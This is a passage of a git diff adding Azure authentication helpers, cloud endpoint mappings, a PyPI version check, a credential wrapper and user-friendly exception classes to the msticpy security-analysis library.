+    Returns
+    -------
+    List[TimeSpan] :
+        TimeSpan(start, end)
+
+    """
+    return [
+        TimeSpan(start=key, end=val)
+        for key, val in extract_anomaly_periods(
+            data=data, time_column=time_column, period=period, pos_only=pos_only
+        ).items()
+    ]
+
+
+def create_time_period_kqlfilter(periods: Dict[datetime, datetime]) -> str:
+    """
+    Create KQL time filter expression from time periods dict.
+
+    Parameters
+    ----------
+    periods : Dict[datetime, datetime]
+        Dict of start, end periods
+
+    Returns
+    -------
+    str
+        KQL filter clause
+
+    """
+    time_column = "TimeGenerated"
+    time_brackets = [
+        f"{time_column} between (datetime({start}) .. datetime({end}))"
+        for start, end in periods.items()
+    ]
+
+    return f"| where {' or '.join(time_brackets)}"
+
+
+def set_new_anomaly_threshold(
+    data: pd.DataFrame, threshold: int, threshold_low: Optional[int] = None
+) -> pd.DataFrame:
+    """
+    Return DataFrame with anomalies calculated based on new threshold.
+
+    Parameters
+    ----------
+    data : pd.DataFrame
+        Input DataFrame
+    threshold : int
+        Threshold above (beyond) which values will be marked as
+        anomalies. Used as positive and negative threshold
+        unless `threshold_low` is specified.
+    threshold_low : Optional[int], optional
+        The threshhold below which values will be reported
+        as anomalies, by default None.
+
+    Returns
+    -------
+    pd.DataFrame
+        Output DataFrame with recalculated anomalies.
+
+    """
+    threshold_low = threshold_low or threshold
+    new_df = data.assign(newanomalies=0)
+    new_df.loc[new_df["score"] >= threshold, "newanomalies"] = 1
+    new_df.loc[new_df["score"] <= -threshold_low, "newanomalies"] = -1
+    return new_df.drop(columns=["anomalies"]).rename(
+        columns={"newanomalies": "anomalies"}
+    )
diff --git a/msticpy/common/__init__.py b/msticpy/common/__init__.py
new file mode 100644
index 000000000..69dff4f9a
--- /dev/null
+++ b/msticpy/common/__init__.py
@@ -0,0 +1,6 @@
+# -------------------------------------------------------------------------
+# Copyright (c) Microsoft Corporation. All rights reserved.
+# Licensed under the MIT License. See License.txt in the project root for
+# license information.
+# --------------------------------------------------------------------------
+"""Common MSTIC modules."""
diff --git a/msticpy/common/azure_auth.py b/msticpy/common/azure_auth.py
new file mode 100644
index 000000000..b0cb9ac34
--- /dev/null
+++ b/msticpy/common/azure_auth.py
@@ -0,0 +1,116 @@
+# -------------------------------------------------------------------------
+# Copyright (c) Microsoft Corporation. All rights reserved.
+# Licensed under the MIT License. See License.txt in the project root for
+# license information.
+# --------------------------------------------------------------------------
+"""Azure authentication handling."""
+import os
+from typing import List
+
+from azure.common.exceptions import CloudError
+from azure.mgmt.subscription import SubscriptionClient
+
+from .._version import VERSION
+
+# importing only_interactive_cred for client use.
+# pylint: disable=unused-import
+from .azure_auth_core import (  # noqa: F401
+    AzCredentials,
+    az_connect_core,
+    AzureCloudConfig,
+    only_interactive_cred,
+)
+
+# pylint: enable=unused-import
+from .provider_settings import get_provider_settings
+
+__version__ = VERSION
+__author__ = "Pete Bryan"
+
+
+def az_connect(
+    auth_methods: List[str] = None,
+    tenant_id: str = None,
+    silent: bool = False,
+) -> AzCredentials:
+    """
+    Connect to Azure SDK/API.
+
+    Parameters
+    ----------
+    auth_methods : List[str], optional
+        List of authentication methods to try
+        Possible options are:
+        - "env" - to get authentication details from environment variables
+        - "cli" - to use Azure CLI authentication details
+        - "msi" - to user Managed Service Identity details
+        - "interactive" - to prompt for interactive login
+        Default is ["env", "cli", "msi", "interactive"]
+    tenant_id : str, optional
+        The tenant to authenticate against. If not supplied, the default
+        tenant for the identity will be used.
+    silent : bool, optional
+        Set True to hide all output during connection, by default False
+
+    Returns
+    -------
+    AzCredentials
+        Named tuple of:
+        - legacy (ADAL) credentials
+        - modern (MSAL) credentials
+
+
+    Raises
+    ------
+    CloudError
+        If chained token credential creation fails.
+
+    """
+    az_cloud_config = AzureCloudConfig()
+    # If using env options try to load from msticpy
+    data_provs = get_provider_settings(config_section="DataProviders")
+    az_cli_config = data_provs.get("AzureCLI")
+    auth_methods = auth_methods or az_cloud_config.auth_methods
+    if az_cli_config and az_cli_config.args:
+        if "auth_methods" in az_cli_config.args:
+            auth_methods = az_cli_config.args.get("auth_methods")
+        if isinstance(auth_methods, list) and "env" in auth_methods:
+            os.environ["AZURE_CLIENT_ID"] = az_cli_config.args.get("clientId") or ""
+            os.environ["AZURE_TENANT_ID"] = az_cli_config.args.get("tenantId") or ""
+            os.environ["AZURE_CLIENT_SECRET"] = (
+                az_cli_config.args.get("clientSecret") or ""
+            )
+    credentials = az_connect_core(
+        auth_methods=auth_methods, tenant_id=tenant_id, silent=silent
+    )
+    sub_client = SubscriptionClient(
+        credential=credentials.modern,
+        base_url=az_cloud_config.endpoints.resource_manager,
+        credential_scopes=[az_cloud_config.token_uri],
+    )
+    if not sub_client:
+        raise CloudError("Could not create a Subscription client.")
+
+    return credentials
+
+
+def az_user_connect(tenant_id: str = None, silent: bool = False) -> AzCredentials:
+    """
+    Authenticate to the SDK using user based authentication methods, Azure CLI or interactive logon.
+
+    Parameters
+    ----------
+    tenant_id : str, optional
+        The tenant to authenticate against. If not supplied, the default tenant for the
+        identity will be used.
+    silent : bool, optional
+        Whether you want the auth process to display any output, by default False
+
+    Returns
+    -------
+    AzCredentials
+
+    """
+    return az_connect_core(
+        auth_methods=["cli", "interactive"], tenant_id=tenant_id, silent=silent
+    )
diff --git a/msticpy/common/azure_auth_core.py b/msticpy/common/azure_auth_core.py
new file mode 100644
index 000000000..801956f6e
--- /dev/null
+++ b/msticpy/common/azure_auth_core.py
@@ -0,0 +1,384 @@
+# -------------------------------------------------------------------------
+# Copyright (c) Microsoft Corporation. All rights reserved.
+# Licensed under the MIT License. See License.txt in the project root for
+# license information.
+# --------------------------------------------------------------------------
+"""Azure KeyVault pre-authentication."""
+import logging
+import sys
+from collections import namedtuple
+from datetime import datetime
+from enum import Enum
+from typing import List, Optional, Tuple
+
+from azure.common.exceptions import CloudError
+from azure.common.credentials import get_cli_profile
+from azure.identity import (
+    AzureCliCredential,
+    ChainedTokenCredential,
+    EnvironmentCredential,
+    InteractiveBrowserCredential,
+    ManagedIdentityCredential,
+)
+from dateutil import parser
+from msrestazure import azure_cloud
+
+from .._version import VERSION
+from .cred_wrapper import CredentialWrapper
+from .exceptions import MsticpyAzureConnectionError
+from ..common import pkg_config as config
+from .cloud_mappings import (
+    get_all_endpoints,
+    get_all_suffixes,
+    CLOUD_ALIASES,
+    CLOUD_MAPPING,
+)
+
+__version__ = VERSION
+__author__ = "Pete Bryan"
+
+
+AzCredentials = namedtuple("AzCredentials", ["legacy", "modern"])
+
+
+def get_azure_config_value(key, default):
+    """Get a config value from Azure section."""
+    try:
+        az_settings = config.get_config("Azure")
+        if az_settings and key in az_settings:
+            return az_settings[key]
+    except KeyError:
+        pass  # no Azure section in config
+    return default
+
+
+def default_auth_methods() -> List[str]:
+    """Get the default (all) authentication options."""
+    return get_azure_config_value("auth_methods", ["cli", "msi", "interactive"])
+
+
+class AzureCloudConfig:
+    """Azure Cloud configuration."""
+
+    def __init__(self, cloud: str = None, tenant_id: Optional[str] = None):
+        """
+        Initialize AzureCloudConfig from `cloud` or configuration.
+
+        Parameters
+        ----------
+        cloud : str, optional
+            The cloud to retrieve configuration for. If not supplied,
+            the cloud ID is read from configuration. If this is not available,
+            it defaults to 'global'.
+        tenant_id : str, optional
+            The tenant to authenticate against. If not supplied,
+            the tenant ID is read from configuration, or the default tenant
+            for the identity.
+
+        """
+        if cloud:
+            self.cloud = cloud
+        else:
+            self.cloud = get_azure_config_value("cloud", "global")
+
+        if tenant_id:
+            self.tenant_id = tenant_id
+        else:
+            self.tenant_id = get_azure_config_value("tenant_id", None)
+
+        self.auth_methods = default_auth_methods()
+
+    @property
+    def cloud_names(self) -> List[str]:
+        """Return a list of current cloud names."""
+        return list(CLOUD_MAPPING.keys())
+
+    @staticmethod
+    def resolve_cloud_alias(alias) -> Optional[str]:
+        """Return match of cloud alias or name."""
+        alias_cf = alias.casefold()
+        aliases = {alias.casefold(): cloud for alias, cloud in CLOUD_ALIASES.items()}
+        if alias_cf in aliases:
+            return aliases[alias_cf]
+        if alias_cf in aliases.values():
+            return alias_cf
+        return None
+
+    @property
+    def endpoints(self) -> azure_cloud.CloudEndpoints:
+        """
+        Get a list of all the endpoints for an Azure cloud.
+
+        Returns
+        -------
+        dict
+            A dictionary of endpoints for the cloud.
+
+        Raises
+        ------
+        MsticpyAzureConfigError
+            If the cloud name is not valid.
+
+        """
+        return get_all_endpoints(self.cloud)
+
+    @property
+    def suffixes(self) -> azure_cloud.CloudSuffixes:
+        """
+        Get a list of all the suffixes for an Azure cloud.
+
+        Returns
+        -------
+        dict
+            A dictionary of suffixes for the cloud.
+
+        Raises
+        ------
+        MsticpyAzureConfigError
+            If the cloud name is not valid.
+
+        """
+        return get_all_suffixes(self.cloud)
+
+    @property
+    def token_uri(self) -> str:
+        """Return the resource manager token URI."""
+        return f"{self.endpoints.resource_manager}.default"
+
+
+def _az_connect_core(
+    auth_methods: List[str] = None,
+    cloud: str = None,
+    tenant_id: str = None,
+    silent: bool = False,
+    **kwargs,
+) -> AzCredentials:
+    """
+    Authenticate using multiple authentication sources.
+
+    Parameters
+    ----------
+    auth_methods : List[str], optional
+        List of authentication methods to try
+        Possible options are:
+        - "env" - to get authentication details from environment variables
+        - "cli" - to use Azure CLI authentication details
+        - "msi" - to user Managed Service Identity details
+        - "interactive" - to prompt for interactive login
+        If not set, it will use the value defined in msticpyconfig.yaml.
+        If this is not set, the default is ["env", "cli", "msi", "interactive"]
+    cloud : str, optional
+        What Azure cloud to connect to.
+        By default it will attempt to use the cloud setting from config file.
+        If this is not set it will default to Azure Public Cloud
+    tenant_id : str, optional
+        The tenant to authenticate against. If not supplied,
+        the tenant ID is read from configuration, or the default tenant for the identity.
+    silent : bool, optional
+        Whether to display any output during auth process. Default is False.
+
+    Returns
+    -------
+    AzCredentials
+                Named tuple of:
+        - legacy (ADAL) credentials
+        - modern (MSAL) credentials
+
+    Raises
+    ------
+    MsticpyAzureConnectionError
+        If invalid auth options are presented.
+    CloudError
+        If chained token credential creation fails.
+
+    Notes
+    -----
+    The function tries to obtain credentials from the following
+    sources:
+    - Azure Auth Environment variables
+    - Azure CLI (if an active session is logged on)
+    - Managed Service Identity
+    - Interactive browser logon
+    If the authentication is successful both ADAL (legacy) and
+    MSAL (modern) credential types are returned.
+
+    """
+    # Create the auth methods with the specified cloud region
+    cloud = cloud or kwargs.pop("region", AzureCloudConfig().cloud)
+    tenant_id = tenant_id or AzureCloudConfig().tenant_id
+    auth_options = _create_auth_options(cloud, tenant_id)
+    if not auth_methods:
+        auth_methods = default_auth_methods()
+    try:
+        auths = [auth_options[meth] for meth in auth_methods]
+    except KeyError as err:
+        raise MsticpyAzureConnectionError(
+            "Unknown authentication option, valid options are; env, cli, msi, interactive"
+        ) from err
+
+    # Filter and replace error message when credentials not found
+    handler = logging.StreamHandler(sys.stdout)
+    if silent:
+        handler.addFilter(_filter_all_warnings)
+    else:
+        handler.addFilter(_filter_credential_warning)
+    logging.basicConfig(level=logging.WARNING, handlers=[handler])
+
+    # Create credentials and connect to the subscription client to validate
+    creds = ChainedTokenCredential(*auths)  # type: ignore
+    legacy_creds = CredentialWrapper(
+        creds, resource_id=AzureCloudConfig(cloud).token_uri
+    )
+    if not creds:
+        raise CloudError("Could not obtain credentials.")
+
+    return AzCredentials(legacy_creds, creds)
+
+
+class _AzCachedConnect:
+    """Singleton class caching Azure credentials."""
+
+    _instance = None
+
+    def __new__(cls):
+        """Override new to check and return existing instance."""
+        if cls._instance is None:
+            cls._instance = super(_AzCachedConnect, cls).__new__(cls)
+            cls.connect.__doc__ = _az_connect_core.__doc__
+        return cls._instance
+
+    def __init__(self):
+        """Initialize the class."""
+        self.az_credentials: Optional[AzCredentials] = None
+        self.cred_cloud: str = self.current_cloud
+
+    @property
+    def current_cloud(self) -> str:
+        """Return current cloud."""
+        return AzureCloudConfig().cloud
+
+    def connect(self, *args, **kwargs):
+        """Call az_connect_core if token is not present or expired."""
+        if self.az_credentials is None:
+            self.az_credentials = _az_connect_core(*args, **kwargs)
+            return self.az_credentials
+        # Check expiry
+        if (
+            datetime.utcfromtimestamp(
+                self.az_credentials.modern.get_token(
+                    AzureCloudConfig().token_uri
+                ).expires_on
+            )
+            <= datetime.utcnow()
+        ):
+            self.az_credentials = _az_connect_core(*args, **kwargs)
+        # Check changed cloud
+        if self.cred_cloud != kwargs.get(
+            "cloud", kwargs.get("region", self.current_cloud)
+        ):
+            self.az_credentials = _az_connect_core(*args, **kwargs)
+        return self.az_credentials
+
+
+# externally callable function using the class above
+# _AZ_CACHED_CONNECT = _AzCachedConnect()
+az_connect_core = _az_connect_core
+
+
+def only_interactive_cred(chained_cred: ChainedTokenCredential):
+    """Return True if only interactivebrowser credentials available."""
+    return len(chained_cred.credentials) == 1 and isinstance(
+        chained_cred.credentials[0], InteractiveBrowserCredential
+    )
+
+
+def _filter_credential_warning(record) -> bool:
+    """Rewrite out credential not found message."""
+    if (
+        not record.name.startswith("azure.identity")
+        or record.levelno != logging.WARNING
+    ):
+        return True
+    message = record.getMessage()
+    if ".get_token" in message:
+        if message.startswith("EnvironmentCredential"):
+            print("Attempting to sign-in with environment variable credentials...")
+        if message.startswith("AzureCliCredential"):
+            print("Attempting to sign-in with Azure CLI credentials...")
+        if message.startswith("ManagedIdentityCredential"):
+            print("Attempting to sign-in with Managed Instance credentials...")
+            print("Falling back to interactive logon.")
+    return not message
+
+
+def _filter_all_warnings(record) -> bool:
+    """Filter out credential error messages."""
+    if record.name.startswith("azure.identity") and record.levelno == logging.WARNING:
+        message = record.getMessage()
+        if ".get_token" in message:
+            return not message
+    return True
+
+
+def _create_auth_options(cloud: str = None, tenant_id: str = None) -> dict:
+    """Create auth options dict with correct cloud set."""
+    az_config = AzureCloudConfig(cloud)
+
+    aad_uri = az_config.endpoints.active_directory  # type: ignore
+
+    return {
+        "env": EnvironmentCredential(),
+        "cli": AzureCliCredential(),
+        "msi": ManagedIdentityCredential(),
+        "interactive": InteractiveBrowserCredential(
+            authority=aad_uri, tenant_id=tenant_id
+        ),
+    }
+
+
+class AzureCliStatus(Enum):
+    """Enumeration for _check_cli_credentials return values."""
+
+    CLI_OK = 0
+    CLI_NOT_INSTALLED = 1
+    CLI_NEEDS_SIGN_IN = 2
+    CLI_TOKEN_EXPIRED = 3
+    CLI_UNKNOWN_ERROR = 4
+
+
+def check_cli_credentials() -> Tuple[AzureCliStatus, Optional[str]]:
+    """Check to see if there is a CLI session with a valid AAD token."""
+    try:
+        cli_profile = get_cli_profile()
+        raw_token = cli_profile.get_raw_token()
+        bearer_token = None
+        if (
+            isinstance(raw_token, tuple)
+            and len(raw_token) == 3
+            and len(raw_token[0]) == 3
+        ):
+            bearer_token = raw_token[0][2]
+            if (
+                parser.parse(bearer_token.get("expiresOn", datetime.min))
+                < datetime.now()
+            ):
+                raise ValueError("AADSTS70043: The refresh token has expired")
+
+        return AzureCliStatus.CLI_OK, "Azure CLI credentials available."
+    except ImportError:
+        # Azure CLI not installed
+        return AzureCliStatus.CLI_NOT_INSTALLED, None
+    except Exception as ex:  # pylint: disable=broad-except
+        if "AADSTS70043: The refresh token has expired" in str(ex):
+            message = (
+                "Azure CLI was detected but the token has expired. "
+                "For Azure CLI single sign-on, please sign in using '!az login'."
+            )
+            return AzureCliStatus.CLI_TOKEN_EXPIRED, message
+        if "Please run 'az login' to setup account" in str(ex):
+            message = (
+                "Azure CLI was detected but no token is available. "
+                "For Azure CLI single sign-on, please sign in using '!az login'."
+            )
+            return AzureCliStatus.CLI_NEEDS_SIGN_IN, message
+        return AzureCliStatus.CLI_UNKNOWN_ERROR, None
diff --git a/msticpy/common/check_version.py b/msticpy/common/check_version.py
new file mode 100644
index 000000000..3730ac7f0
--- /dev/null
+++ b/msticpy/common/check_version.py
@@ -0,0 +1,41 @@
+# -------------------------------------------------------------------------
+# Copyright (c) Microsoft Corporation. All rights reserved.
+# Licensed under the MIT License. See License.txt in the project root for
+# license information.
+# --------------------------------------------------------------------------
+"""Check current version against PyPI."""
+from pkg_resources import parse_version
+
+import httpx
+
+from .._version import VERSION
+
+__version__ = VERSION
+__author__ = "Ian Hellen"
+
+
+def check_version():
+    """Check the current version against latest on PyPI."""
+    installed_version = parse_version(__version__)
+
+    # fetch package metadata from PyPI
+    pypi_url = "https://pypi.org/pypi/msticpy/json"
+    pkg_data = httpx.get(pypi_url).json()
+    latest_version = pkg_data.get("info", {}).get("version", None)
+    if latest_version:
+        latest_version = parse_version(latest_version)
+    else:
+        latest_version = max(parse_version(s) for s in pkg_data["releases"].keys())
+
+    print(
+        "msticpy version",
+        "installed:",
+        installed_version,
+        "latest published:",
+        latest_version,
+    )
+    if installed_version < latest_version:
+        print(f"A newer version of msticpy - {latest_version} is available.")
+        print("Upgrade with 'pip install --upgrade msticpy'")
+    else:
+        print("Latest version is installed.")
diff --git a/msticpy/common/cloud_mappings.py b/msticpy/common/cloud_mappings.py
new file mode 100644
index 000000000..177e11ed9
--- /dev/null
+++ b/msticpy/common/cloud_mappings.py
@@ -0,0 +1,126 @@
+# -------------------------------------------------------------------------
+# Copyright (c) Microsoft Corporation. All rights reserved.
+# Licensed under the MIT License. See License.txt in the project root for
+# license information.
+# --------------------------------------------------------------------------
+"""Azure Cloud Mappings."""
+from msrestazure import azure_cloud
+
+from .._version import VERSION
+from .exceptions import MsticpyAzureConfigError
+
+__version__ = VERSION
+__author__ = "Pete Bryan"
+
+CLOUD_MAPPING = {
+    "global": azure_cloud.AZURE_PUBLIC_CLOUD,
+    "usgov": azure_cloud.AZURE_US_GOV_CLOUD,
+    "de": azure_cloud.AZURE_GERMAN_CLOUD,
+    "cn": azure_cloud.AZURE_CHINA_CLOUD,
+}
+
+CLOUD_ALIASES = {"public": "global", "gov": "usgov", "germany": "de", "china": "cn"}
+
+
+def create_cloud_suf_dict(suffix: str) -> dict:
+    """
+    Get all the suffixes for a specific service in a cloud.
+
+    Parameters
+    ----------
+    suffix : str
+        The name of the suffix to get details for.
+
+    Returns
+    -------
+    dict
+        A dictionary of cloud names and suffixes.
+
+    """
+    return {
+        cloud: getattr(msr_cloud.suffixes, suffix)
+        for cloud, msr_cloud in CLOUD_MAPPING.items()
+    }
+
+
+def create_cloud_ep_dict(endpoint: str) -> dict:
+    """
+    Return lookup dict for cloud endpoints.
+
+    Parameters
+    ----------
+    endpoint : str
+        The name of the endpoint to retreive for each cloud.
+
+    Returns
+    -------
+    dict
+        A dictionary of cloud names and endpoints.
+
+    """
+    return {
+        cloud: getattr(msr_cloud.endpoints, endpoint)
+        for cloud, msr_cloud in CLOUD_MAPPING.items()
+    }
+
+
+def get_all_endpoints(cloud: str) -> azure_cloud.CloudEndpoints:
+    """
+    Get a list of all the endpoints for an Azure cloud.
+
+    Parameters
+    ----------
+    cloud : str
+        The name of the Azure cloud to get endpoints for.
+
+    Returns
+    -------
+    dict
+        A dictionary of endpoints for the cloud.
+
+    Raises
+    ------
+    MsticpyAzureConfigError
+        If the cloud name is not valid.
+
+    """
+    cloud = CLOUD_ALIASES.get(cloud, cloud)
+    try:
+        endpoints = CLOUD_MAPPING[cloud].endpoints
+    except KeyError as cloud_err:
+        raise MsticpyAzureConfigError(
+            f"""{cloud} is not a valid Azure cloud name.
+        Valid names are 'global', 'usgov', 'de', 'cn'"""
+        ) from cloud_err
+    return endpoints
+
+
+def get_all_suffixes(cloud: str) -> azure_cloud.CloudSuffixes:
+    """
+    Get a list of all the suffixes for an Azure cloud.
+
+    Parameters
+    ----------
+    cloud : str
+        The name of the Azure cloud to get suffixes for.
+
+    Returns
+    -------
+    dict
+        A dictionary of suffixes for the cloud.
+
+    Raises
+    ------
+    MsticpyAzureConfigError
+        If the cloud name is not valid.
+
+    """
+    cloud = CLOUD_ALIASES.get(cloud, cloud)
+    try:
+        endpoints = CLOUD_MAPPING[cloud].suffixes
+    except KeyError as cloud_err:
+        raise MsticpyAzureConfigError(
+            f"""{cloud} is not a valid Azure cloud name.
+        Valid names are 'global', 'usgov', 'de', 'cn'"""
+        ) from cloud_err
+    return endpoints
diff --git a/msticpy/common/cred_wrapper.py b/msticpy/common/cred_wrapper.py
new file mode 100644
index 000000000..a1284aac7
--- /dev/null
+++ b/msticpy/common/cred_wrapper.py
@@ -0,0 +1,77 @@
+# -------------------------------------------------------------------------
+# Copyright (c) Microsoft Corporation. All rights reserved.
+# Licensed under the MIT License. See License.txt in the project root for
+# license information.
+# --------------------------------------------------------------------------
+"""Credential wrapper to expose ADAL and MSAL credentials."""
+from typing import Any, Dict
+
+from azure.core.pipeline import PipelineContext, PipelineRequest
+from azure.core.pipeline.policies import BearerTokenCredentialPolicy
+from azure.core.pipeline.transport import HttpRequest
+from azure.identity import DefaultAzureCredential
+from msrest.authentication import BasicTokenAuthentication
+
+from .._version import VERSION
+
+__version__ = VERSION
+__author__ = "Pete Bryan"
+
+
+# Class to extract v1 authentication token from DefaultAzureCredential object.
+# Credit - https://gist.github.com/lmazuel/cc683d82ea1d7b40208de7c9fc8de59d
+class CredentialWrapper(BasicTokenAuthentication):
+    """Class for handling legacy auth conversion."""
+
+    def __init__(
+        self,
+        credential: Any = None,
+        resource_id: str = "https://management.azure.com/.default",
+        **kwargs,
+    ):
+        """
+        Wrap azure-identity credential to work with SDK that needs ADAL.
+
+        Parameters
+        ----------
+        credential : Any, optional
+            Any azure-identity credential, by default DefaultAzureCredential
+        resource_id : str, optional
+            The scope used to get the token, by default
+            "https://management.azure.com/.default"
+
+        """
+        super().__init__(None)  # type: ignore
+        self.token: Dict[str, Any] = {}
+        if credential is None:
+            credential = DefaultAzureCredential()
+
+        self._policy = BearerTokenCredentialPolicy(credential, resource_id, **kwargs)
+
+    def set_token(self):
+        """
+        Ask the azure-core BearerTokenCredentialPolicy policy to get a token.
+
+        Using the policy gives us for free the caching system of azure-core.
+        We could make this code simpler by using private method, but by definition
+        I can't assure they will be there forever, so mocking a fake call to the policy
+        to extract the token, using 100% public API.
+
+        """
+        request = _make_request()
+        self._policy.on_request(request)
+        # Read Authorization, and get the second part after Bearer
+        token = request.http_request.headers["Authorization"].split(" ", 1)[1]
+        self.token = {"access_token": token}
+
+    def signed_session(self, session=None):
+        """Wrap signed session object."""
+        self.set_token()
+        return super().signed_session(session)
+
+
+def _make_request():
+    """Make mocked request to get token."""
+    return PipelineRequest(
+        HttpRequest("CredentialWrapper", "https://fakeurl"), PipelineContext(None)
+    )
diff --git a/msticpy/common/exceptions.py b/msticpy/common/exceptions.py
new file mode 100644
index 000000000..90f03f24b
--- /dev/null
+++ b/msticpy/common/exceptions.py
@@ -0,0 +1,438 @@
+# -------------------------------------------------------------------------
+# Copyright (c) Microsoft Corporation. All rights reserved.
+# Licensed under the MIT License. See License.txt in the project root for
+# license information.
+# --------------------------------------------------------------------------
+"""Miscellaneous helper methods for Jupyter Notebooks."""
+import contextlib
+from typing import List, Tuple, Union
+
+from IPython.display import display
+
+from .utility import is_ipython
+from .._version import VERSION
+
+__version__ = VERSION
+__author__ = "Ian Hellen"
+
+
+# placeholder for pkg_config.get_config - this function is
+# overwritten by msticpy.common.pkg_config
+def _get_config(setting_path: str):
+    del setting_path
+    return True
+
+
+# Standard exception types
+class MsticpyException(Exception):
+    """Default exception class for msticpy."""
+
+
+class MsticpyConfigException(MsticpyException):
+    """Configuration exception class for msticpy."""
+
+
+class MsticpyResourceException(MsticpyException):
+    """Exception class for resource errors."""
+
+
+######################################
+# User-friendly displayable exceptions
+# ------------------------------------
+# Note: for ease of distinguishing the two exception types
+# name any classes derived from MsticpyUserError with an "Error"
+# suffix. Name classes derived from MsticpyException with an
+# "Exception" suffix
+class MsticpyUserError(MsticpyException):
+    """Msticpy User exception displaying friendly message."""
+
+    _display_exceptions = True
+
+    DEF_HELP_URI = ("msticpy documentation", "https://msticpy.readthedocs.org")
+
+    def __init__(
+        self, *args, help_uri: Union[Tuple[str, str], str, None] = None, **kwargs
+    ):
+        """
+        Create an instance of the MsticpyUserError class.
+
+        Parameters
+        ----------
+        args : Iterable of strings
+            Args will be printed as text of the exception.
+        help_uri : Union[Tuple[str, str], str, None], optional
+            Primary URL, by default "https://msticpy.readthedocs.org"
+
+        Other Parameters
+        ----------------
+        title : str
+            If a `title` keyword argument is supplied it will be used
+            to create the title line.
+        *_uri : str
+            Additional keyword arguments who's names end in "_uri"
+            will be used to create a list of references in addition to
+            the primary `help_uri`
+
+        Notes
+        -----
+        The exception text is displayed when the exception is created
+        and *not* when it is raised. We recommend creating the exception
+        within the `raise` statement. E.g.
+
+        `raise MsticpyUserException(arg1, arg2...)`
+
+        Developer note:
+        Any classes derived from MsticpyUserError should be named with
+        an "Error" suffix to distinguish these from standard exception types.
+
+        """
+        # This nasty-looking thing just means that this is a list that
+        # holds:
+        # just strings - for simple args strings
+        # tuples(str, str) - if the item is annotated as a uri or title
+        # tuple(tuple(str, str), str) - if the URI is a tuple of display_name, URI
+        self._output: List[
+            Union[str, Tuple[str, str], Tuple[Tuple[str, str], str]]
+        ] = []
+        title = kwargs.pop("title", "we've hit an error while running")
+        self._output.append((f"{self.__class__.__name__} - {title}", "title"))
+
+        self._output.extend(args)
+
+        self._output.append("\nFor more help on fixing this error see:")
+        if not help_uri:
+            help_uri = self.DEF_HELP_URI
+        self._output.append((help_uri, "uri"))  # type: ignore
+
+        help_args = [
+            kw_val for kw_arg, kw_val in kwargs.items() if kw_arg.endswith("_uri")
+        ]
+        if help_args:
+            self._output.append("You can find other related help here:")
+            for uri in help_args:
+                self._output.append((uri, "uri"))
+        if _get_config("msticpy.FriendlyExceptions"):
+            self._display_exception()
+
+        # add the extra elements to the the exception standard args.
+        ex_args = [title, *args, help_uri, *help_args]
+        super().__init__(*ex_args)
+
+    @classmethod
+    @contextlib.contextmanager
+    def no_display_exceptions(cls):
+        """Context manager to block exception display to IPython/stdout."""
+        cls._display_exceptions = False
+        yield
+        cls._display_exceptions = True
+
+    @property
+    def help_uri(self) -> Union[Tuple[str, str], str]:
+        """Get the default help URI."""
+        return self.DEF_HELP_URI
+
+    def _display_exception(self):
+        if not self._display_exceptions:
+            return
+        if is_ipython():
+            display(self)
+        else:
+            self._display_txt_exception()
+
+    def _repr_html_(self):
+        """Return HTML-formatted exception text."""
+        ex_style = """
+        <style>
+            div.solid {border: thin solid black; padding:10px;}
+            p.title {background-color:Tomato; padding:5px;}
+            ul.circle {list-style-type: circle;}
+        </style>
+        """
+        div_tmplt = "<div class='solid'>{content}</div>"
+        about_blank = "target='_blank' rel='noopener noreferrer'"
+        content = []
+        for line in self._output:
+            if isinstance(line, tuple):
+                l_content, l_type = line
+                if l_type == "title":
+                    content.append(f"<h3><p class='title'>{l_content}</p></h3>")
+                elif l_type == "uri":
+                    if isinstance(l_content, tuple):
+                        name, uri = l_content
+                    else:
+                        name = uri = l_content
+                    content.append(
+                        f"<ul class='circle'><li><a href='{uri}' {about_blank}>"
+                        f"{name}</a></li></ul>"
+                    )
+            else:
+                text_line = line.replace("\n", "<br>")
+                content.append(f"{text_line}<br>")
+
+        return "".join((ex_style, div_tmplt.format(content="".join(content))))
+
+    def _display_txt_exception(self):
+        """Display text-only version of the exception text."""
+        print(self._get_exception_text())
+
+    def _get_exception_text(self) -> str:
+        out_lines = []
+        for line in self._output:
+            if isinstance(line, tuple):
+                l_content, l_type = line
+                if isinstance(l_content, tuple):
+                    l_content = l_content[0]
+                if l_type == "title":
+                    out_lines.append("-" * len(l_content))
+                    out_lines.append(l_content)
+                    out_lines.append("-" * len(l_content))
+                elif l_type == "uri":
+                    if isinstance(l_content, tuple):
+                        out_lines.append(f" - {': '.join(l_content)}")
+                    else:
+                        out_lines.append(f" - {l_content}")
+            else:
+                out_lines.append(line)
+        return "\n".join(out_lines)
+
+
+class MsticpyUserConfigError(MsticpyUserError):
+    """Configuration user exception class for msticpy."""
+
+    DEF_HELP_URI = (
+        "Configuring msticpy",
+        "https://msticpy.readthedocs.io/en/latest/getting_started/msticpyconfig.html",
+    )
+
+    def __init__(
+        self, *args, help_uri: Union[Tuple[str, str], str, None] = None, **kwargs
+    ):
+        """
+        Create generic user configuration exception.
+
+        Parameters
+        ----------
+        help_uri : Union[Tuple[str, str], str, None], optional
+            Override the default help URI.
+
+        """
+        def_mssg = "There is a problem with configuration in your msticpyconfig.yaml."
+        mp_loc_mssg = [
+            "Ensure that the path to your msticpyconfig.yaml is specified with"
+            + " the MSTICPYCONFIG environment variable.",
+            "Or ensure that a copy of this file is in the current directory.",
+        ]
+        add_args = [*args, *mp_loc_mssg] if args else [def_mssg, *mp_loc_mssg]
+        if help_uri:
+            uri: Union[Tuple[str, str], str] = help_uri
+            add_uris = {"basehelp_uri": self.DEF_HELP_URI}
+        else:
+            uri = self.DEF_HELP_URI
+            add_uris = {}
+        super().__init__(*add_args, help_uri=uri, **add_uris, **kwargs)
+
+
+class MsticpyKeyVaultConfigError(MsticpyUserConfigError):
+    """Key Vault configuration exception."""
+
+    DEF_HELP_URI = (
+        "Using keyvault to store msticpy secrets",
+        "https://msticpy.readthedocs.io/en/latest/getting_started/msticpyconfig.html"
+        + "#specifying-secrets-as-key-vault-secrets",
+    )
+
+    def __init__(
+        self, *args, help_uri: Union[Tuple[str, str], str, None] = None, **kwargs
+    ):
+        """
+        Create Key Vault configuration exception.
+
+        Parameters
+        ----------
+        help_uri : Union[Tuple[str, str], str, None], optional
+            Override the default help URI.
+
+        """
+        mssg = (
+            "Please verify that a valid KeyVault section has been configured"
+            + "in your msticpyconfig.yaml."
+        )
+        add_args = [*args, mssg]
+        uri = help_uri or self.DEF_HELP_URI
+        super().__init__(*add_args, help_uri=uri, **kwargs)
+
+
+class MsticpyKeyVaultMissingSecretError(MsticpyKeyVaultConfigError):
+    """Missing secret exception."""
+
